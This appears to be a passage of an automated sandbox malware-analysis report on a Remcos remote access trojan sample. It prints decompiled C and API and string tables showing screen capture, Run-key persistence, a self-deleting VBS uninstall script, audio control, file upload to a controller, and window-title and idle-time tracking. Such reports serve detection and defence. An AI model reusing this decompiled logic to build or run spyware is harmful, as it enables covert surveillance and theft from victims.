                                          • CreateCompatibleDC.GDI32(00000000), ref: 0041492D
                                            • Part of subcall function 00414D3D: GetMonitorInfoW.USER32(?,?), ref: 00414D5D
                                            • Part of subcall function 00414D89: GetMonitorInfoW.USER32(?,?), ref: 00414DA9
                                          • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041497B
                                          • DeleteDC.GDI32(00000000), ref: 0041498F
                                          • DeleteDC.GDI32(00000000), ref: 00414992
                                          • DeleteObject.GDI32(?), ref: 00414996
                                          • SelectObject.GDI32(00000000,00000000), ref: 004149A0
                                          • DeleteDC.GDI32(00000000), ref: 004149B1
                                          • DeleteDC.GDI32(00000000), ref: 004149B4
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 004149F0
                                          • GetCursorInfo.USER32(?,?,?), ref: 00414A0B
                                          • GetIconInfo.USER32(?,?), ref: 00414A1F
                                          • DeleteObject.GDI32(?), ref: 00414A44
                                          • DeleteObject.GDI32(?), ref: 00414A4D
                                          • DrawIcon.USER32 ref: 00414A5C
                                          • GetObjectA.GDI32(?,00000018,?), ref: 00414A70
                                          • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414AD6
                                          • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 00414B3F
                                          • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414B63
                                          • DeleteDC.GDI32(?), ref: 00414B76
                                          • DeleteDC.GDI32(00000000), ref: 00414B79
                                          • DeleteObject.GDI32(?), ref: 00414B7E
                                          • GlobalFree.KERNEL32 ref: 00414B88
                                          • DeleteObject.GDI32(?), ref: 00414C2D
                                          • GlobalFree.KERNEL32 ref: 00414C34
                                          • DeleteDC.GDI32(?), ref: 00414C43
                                          • DeleteDC.GDI32(00000000), ref: 00414C46
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
                                          • String ID: DISPLAY
                                          • API String ID: 517350757-865373369
                                          • Opcode ID: 5e19a8e7c5a1e7cfd16629166915223df8c5f8e766858db65ebc949d59fd66ec
                                          • Instruction ID: 04b928e990297c4dc387ef5bf1f87de0b325f6e157068eb4714aaf8e6101e2a9
                                          • Opcode Fuzzy Hash: 5e19a8e7c5a1e7cfd16629166915223df8c5f8e766858db65ebc949d59fd66ec
                                          • Instruction Fuzzy Hash: 1DB17171900319AFDB10DFA0DC45BEEBBB8EF44756F00402AF949E7290DB74AA45CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B0E2, Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 280registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E0040B0E2(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				E0041015B();
				if( *0x46a9d4 != 0x30) {
					L00409D73();
				}
				_t243 =  *0x46bd6b - 1; // 0x0
				if(_t243 == 0) {
					E0041537E(_t243);
				}
				if( *0x46ba75 != 0) {
					E00417754(L00401EEB(0x46c0e0));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x46bb02 - 1; // 0x1
				if(_t245 == 0) {
					E00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401EEB(0x46c4e8));
				}
				_t246 =  *0x46bafb - 1; // 0x0
				if(_t246 == 0) {
					E00410D5C(0x80000002, _t231, L00401EEB(0x46c4e8));
				}
				_t247 =  *0x46bb00 - 1; // 0x0
				if(_t247 == 0) {
					E00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401EEB(0x46c4e8));
				}
				_t53 = E00402489();
				_t54 = L00401F95(0x46c560);
				_t57 = E00410A30(L00401F95(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F95(0x46c518));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x46c530;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E004074E4(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46c530;
					SetFileAttributesW(L00401EEB(0x46c530), 0x80);
				}
				E004030A6(_t134,  &_v124, E0040427F(_t134,  &_v52, E0043987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				L00401EF0();
				E00404405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401EF0();
				_t250 = _t134;
				if(_t134 != 0) {
					E00403311(E004030A6(_t134,  &_v52, E00404405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					L00401EF0();
					L00401EF0();
					L00401EF0();
				}
				E00403311(E004030A6(_t134,  &_v100, E004030A6(_t134,  &_v76, E0040427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				_t251 = _t134;
				if(_t134 != 0) {
					E0040766C(_t134,  &_v28, 0, L"wend\n");
				}
				_t78 = E004074E4(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E00403311(E004030A6(0x45f724,  &_v100, L00409E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
					L00401EF0();
					L00401EF0();
				}
				_t79 = E0040427F(0x45f724,  &_v172, L"\"\"\", 0");
				E00403311(E004030A6(0x45f724,  &_v100, E00403030( &_v76, E00404429(0x45f724,  &_v52, E0040427F(0x45f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				E0040766C(0x45f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = L00401EEB( &_v124);
				_t93 = E00402489();
				if(E00417947(L00401EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401EEB( &_v124), 0x45f724, 0x45f724, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401EF0();
				L00401EF0();
				return L00401EF0();
			}




























                                          0x0040b0ee
                                          0x0040b0fa
                                          0x0040b0fc
                                          0x0040b0fc
                                          0x0040b104
                                          0x0040b10a
                                          0x0040b10c
                                          0x0040b10c
                                          0x0040b118
                                          0x0040b126
                                          0x0040b126
                                          0x0040b130
                                          0x0040b135
                                          0x0040b13b
                                          0x0040b14c
                                          0x0040b151
                                          0x0040b152
                                          0x0040b158
                                          0x0040b169
                                          0x0040b16e
                                          0x0040b16f
                                          0x0040b175
                                          0x0040b189
                                          0x0040b18e
                                          0x0040b196
                                          0x0040b19e
                                          0x0040b1c4
                                          0x0040b1ce
                                          0x0040b1d0
                                          0x0040b1db
                                          0x0040b1db
                                          0x0040b1ee
                                          0x0040b206
                                          0x0040b211
                                          0x0040b216
                                          0x0040b218
                                          0x0040b21b
                                          0x0040b220
                                          0x0040b222
                                          0x0040b229
                                          0x0040b234
                                          0x0040b234
                                          0x0040b254
                                          0x0040b25d
                                          0x0040b278
                                          0x0040b281
                                          0x0040b286
                                          0x0040b288
                                          0x0040b2bc
                                          0x0040b2c4
                                          0x0040b2cc
                                          0x0040b2d4
                                          0x0040b2d4
                                          0x0040b30c
                                          0x0040b314
                                          0x0040b31c
                                          0x0040b324
                                          0x0040b329
                                          0x0040b32b
                                          0x0040b335
                                          0x0040b335
                                          0x0040b348
                                          0x0040b34d
                                          0x0040b34f
                                          0x0040b374
                                          0x0040b37c
                                          0x0040b384
                                          0x0040b384
                                          0x0040b399
                                          0x0040b3d8
                                          0x0040b3e0
                                          0x0040b3e8
                                          0x0040b3f0
                                          0x0040b3fb
                                          0x0040b406
                                          0x0040b413
                                          0x0040b41c
                                          0x0040b425
                                          0x0040b443
                                          0x0040b463
                                          0x0040b463
                                          0x0040b46c
                                          0x0040b474
                                          0x0040b487

                                          APIs
                                            • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                                            • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B1DB
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B1EE
                                          • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B206
                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B234
                                            • Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
                                            • Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
                                            • Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4
                                            • Part of subcall function 00417947: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B457
                                          • ExitProcess.KERNEL32 ref: 0040B463
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                          • API String ID: 1861856835-219127200
                                          • Opcode ID: aa58ae454d06a12c87e700ab7569462d85b32519fc212bd3da7bf483e7861833
                                          • Instruction ID: 15120c8502facc1a94d34f6ce0dfcdb30145111763f7023834469a4ad8d2fcb5
                                          • Opcode Fuzzy Hash: aa58ae454d06a12c87e700ab7569462d85b32519fc212bd3da7bf483e7861833
                                          • Instruction Fuzzy Hash: 52915E31A101185ACB14FBA1DCA6AEF776AAF50744F10007FB806771E3EF785E4A869D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004169CC, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E004169CC(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(L00416C12( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = L00401EEB( &_a4);
					_t103 = 0x30;
					L00401EFA( &_a4, 0x30, _t111, E0041805B( &_v28, 0x30, _t63));
					L00401EF0();
				}
				_t25 = E00402489();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(L00401EEB( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402084(_t67, _t114 - 0x18, 0x45f6bc);
						_push(0xa8);
						E00404AA4(_t67, 0x46ca18, _t103, __eflags);
					}
				} else {
					_t60 = L00401EEB( &_a4);
					_t118 = _t114 - 0x18;
					E004020EC(_t67, _t118, _t103, _t120, _t109);
					L00417A4E(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = E004172DA( &_v124, _t67);
					_t108 = E00403030( &_v28, E004030A6(_t67,  &_v76, L00409E69( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E004030A6(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					L00401EF0();
					L00401EF0();
					L00401EF0();
					L00401EF0();
					mciSendStringW(L00401EEB( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00402084(0, _t114 - 0x18, 0x45f6bc);
					_push(0xa9);
					E00404AA4(0, 0x46ca18, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46bea8 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x46bea6; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x46bea6 = 0;
							}
							__eflags =  *0x46bea5; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x46bea5 = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x46bea8);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x46bea8; // 0x0
							} else {
								CloseHandle( *0x46bea8);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402084(0, _t115 - 0x18, 0x45f6bc);
						_push(0xaa);
						E00404AA4(0, 0x46ca18, _t108, _t122);
						L00401EF0();
						goto L21;
					}
				}
				L21:
				return L00401EF0();
			}
























                                          0x004169cc
                                          0x004169d6
                                          0x004169d8
                                          0x004169e6
                                          0x004169eb
                                          0x004169f1
                                          0x00416a00
                                          0x00416a08
                                          0x00416a08
                                          0x00416a0f
                                          0x00416a17
                                          0x00416a19
                                          0x00416b06
                                          0x00416b08
                                          0x00000000
                                          0x00416b0e
                                          0x00416b18
                                          0x00416b1d
                                          0x00416b27
                                          0x00416b27
                                          0x00416a1f
                                          0x00416a1f
                                          0x00416a24
                                          0x00416a2c
                                          0x00416a33
                                          0x00416a38
                                          0x00416a3b
                                          0x00416a45
                                          0x00416a78
                                          0x00416a7d
                                          0x00416a86
                                          0x00416a8e
                                          0x00416a96
                                          0x00416a9e
                                          0x00416ab1
                                          0x00416ac5
                                          0x00416ac7
                                          0x00416ad1
                                          0x00416ad6
                                          0x00416ae0
                                          0x00416aea
                                          0x00416af0
                                          0x00416af0
                                          0x00416af0
                                          0x00416bc1
                                          0x00416bc1
                                          0x00416bc3
                                          0x00000000
                                          0x00000000
                                          0x00416b31
                                          0x00416b37
                                          0x00416b41
                                          0x00416b43
                                          0x00416b43
                                          0x00416b49
                                          0x00416b4f
                                          0x00416b59
                                          0x00416b5b
                                          0x00416b5b
                                          0x00416b6d
                                          0x00416b6f
                                          0x00416b72
                                          0x00416b77
                                          0x00416b79
                                          0x00416b7d
                                          0x00416b80
                                          0x00000000
                                          0x00000000
                                          0x00416b82
                                          0x00416b83
                                          0x00416b86
                                          0x00000000
                                          0x00416b88
                                          0x00416b8e
                                          0x00416b8e
                                          0x00000000
                                          0x00416b86
                                          0x00416ba5
                                          0x00416ba7
                                          0x00416bbc
                                          0x00416ba9
                                          0x00416baf
                                          0x00416bb5
                                          0x00000000
                                          0x00416bb5
                                          0x00416ba7
                                          0x00416bd1
                                          0x00416bdb
                                          0x00416be7
                                          0x00416bec
                                          0x00416bf6
                                          0x00416bfe
                                          0x00000000
                                          0x00416bfe
                                          0x00416af0
                                          0x00416c03
                                          0x00416c11

                                          APIs
                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416AB1
                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416AC5
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6BC), ref: 00416AEA
                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 00416B00
                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00416B41
                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00416B59
                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00416B6D
                                          • SetEvent.KERNEL32 ref: 00416B8E
                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 00416B9F
                                          • CloseHandle.KERNEL32 ref: 00416BAF
                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416BD1
                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00416BDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                          • API String ID: 738084811-1354618412
                                          • Opcode ID: 2bcdb4351dccc8f7a303e70d098165e7762f089ba3e88cfe110070c02b5c2524
                                          • Instruction ID: 973dc57b0db8283a3ff3d0709b6d05c4eb7b4f2cac8df707c3dce394e9b06912
                                          • Opcode Fuzzy Hash: 2bcdb4351dccc8f7a303e70d098165e7762f089ba3e88cfe110070c02b5c2524
                                          • Instruction Fuzzy Hash: 755180716001086FD704BBB5DC92DFF3A6DDA41389B10413FF902A61E2EF799D8586AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004476AD, Relevance: 27.4, APIs: 18, Instructions: 419COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                          • String ID:
                                          • API String ID: 2719235668-0
                                          • Opcode ID: 7ba57cf3f1bad6e4f919242c9e13473e351fc124188cd031a585d84597371e8b
                                          • Instruction ID: db3f33f972ccc31960696266c8304923ec6ec277b5ade58ccf050fecc9e19cec
                                          • Opcode Fuzzy Hash: 7ba57cf3f1bad6e4f919242c9e13473e351fc124188cd031a585d84597371e8b
                                          • Instruction Fuzzy Hash: 15D148B1908300AFFB21AF758881A6F77A8EF05354F14416FE945A7382EB7D9902C79D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004064A2, Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 345fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404A08: connect.WS2_32(?,?,00000010), ref: 00404A23
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00406524
                                          • __aulldiv.LIBCMT ref: 004065A6
                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00406614
                                          • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 0040662F
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                            • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
                                          • API String ID: 1319223106-2190262076
                                          • Opcode ID: bb9b9e046f18df13769a8b787e7ac1b47d7a5fbf9c12ca0a2a4058909c6e6bd6
                                          • Instruction ID: 173749a7d42c5eabba2dba03019d43edcf8f50480dc145d367e539a2da324ad2
                                          • Opcode Fuzzy Hash: bb9b9e046f18df13769a8b787e7ac1b47d7a5fbf9c12ca0a2a4058909c6e6bd6
                                          • Instruction Fuzzy Hash: F5C16B31A00219ABCB14FBA5DD829EEB7B5AF44304F10817FF406B62D1EF385A449F99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043F5AB, Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID:
                                          • API String ID: 2509303402-0
                                          • Opcode ID: 7694ea18338fa1bfac6c26abc79962f6d292df763f94c390f2a259a7191eca11
                                          • Instruction ID: 1e5099d4cf7091294613e4cd6a63c328f2291409cd47a3a75e98f44bfb697c1d
                                          • Opcode Fuzzy Hash: 7694ea18338fa1bfac6c26abc79962f6d292df763f94c390f2a259a7191eca11
                                          • Instruction Fuzzy Hash: FEB18E71D002059FEB15AFB9C881BEEBBB4BF08304F14407EE955A7352DB7998498B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00449546, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 0044958A
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 0044879F
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 004487B1
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 004487C3
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 004487D5
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 004487E7
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 004487F9
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 0044880B
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 0044881D
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 0044882F
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 00448841
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 00448853
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 00448865
                                            • Part of subcall function 00448782: _free.LIBCMT ref: 00448877
                                          • _free.LIBCMT ref: 0044957F
                                            • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                            • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                          • _free.LIBCMT ref: 004495A1
                                          • _free.LIBCMT ref: 004495B6
                                          • _free.LIBCMT ref: 004495C1
                                          • _free.LIBCMT ref: 004495E3
                                          • _free.LIBCMT ref: 004495F6
                                          • _free.LIBCMT ref: 00449604
                                          • _free.LIBCMT ref: 0044960F
                                          • _free.LIBCMT ref: 00449647
                                          • _free.LIBCMT ref: 0044964E
                                          • _free.LIBCMT ref: 0044966B
                                          • _free.LIBCMT ref: 00449683
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: a7a44145eda274c6b868085031fcefb37300b09f98cd336fdb7b7f61136a4ce2
                                          • Instruction ID: bc7df33f33a806a4e6538402b94214bd38d1e854ce5dbc401830de06ad29eac0
                                          • Opcode Fuzzy Hash: a7a44145eda274c6b868085031fcefb37300b09f98cd336fdb7b7f61136a4ce2
                                          • Instruction Fuzzy Hash: 46316B32600601AFFB21AA3AD845B5B73E8AF01354F21441FE659D7251DF3AAD509B2C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00448880, Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: ff559e5e999e58a004be9679cc9065634e2accb6f8594f74057a9405fe1c658f
                                          • Instruction ID: 0fd459aec3f5e05b68cc896b93c3b77f39616f80babc804ed9fa449a4b9e12b5
                                          • Opcode Fuzzy Hash: ff559e5e999e58a004be9679cc9065634e2accb6f8594f74057a9405fe1c658f
                                          • Instruction Fuzzy Hash: 0EC10571E40204AFEB20DBA9CC42FEF77F8EB49705F14415AFB05EB282D6B499419798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044F255, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0044EF23: CreateFileW.KERNEL32(00000000,00000000,?,0044F2FE,?,?,00000000,?,0044F2FE,00000000,0000000C), ref: 0044EF40
                                          • GetLastError.KERNEL32 ref: 0044F369
                                          • __dosmaperr.LIBCMT ref: 0044F370
                                          • GetFileType.KERNEL32(00000000), ref: 0044F37C
                                          • GetLastError.KERNEL32 ref: 0044F386
                                          • __dosmaperr.LIBCMT ref: 0044F38F
                                          • CloseHandle.KERNEL32(00000000), ref: 0044F3AF
                                          • CloseHandle.KERNEL32(?), ref: 0044F4F9
                                          • GetLastError.KERNEL32 ref: 0044F52B
                                          • __dosmaperr.LIBCMT ref: 0044F532
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                                          • Instruction ID: 8387d8c7474957efea47537ed2c3f831a95fafc38b1db0bb8119202e772c3410
                                          • Opcode Fuzzy Hash: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                                          • Instruction Fuzzy Hash: 18A15A32A105489FEF19DF68D8417AE7BA0EB06324F14016EF801DB392DB799D16CB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409195, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004091F7
                                          • Sleep.KERNEL32(000001F4), ref: 00409202
                                          • GetForegroundWindow.USER32 ref: 00409208
                                          • GetWindowTextLengthW.USER32(00000000), ref: 00409211
                                          • GetWindowTextW.USER32 ref: 00409245
                                          • Sleep.KERNEL32(000003E8), ref: 00409313
                                            • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                                            • Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                                          • String ID: [ ${ User has been idle for $ ]$ minutes }
                                          • API String ID: 107669343-3343415809
                                          • Opcode ID: 5208e0e58cc42efc71676e40296c05a26964b477c59cb947b62b6e083ccbcc4a
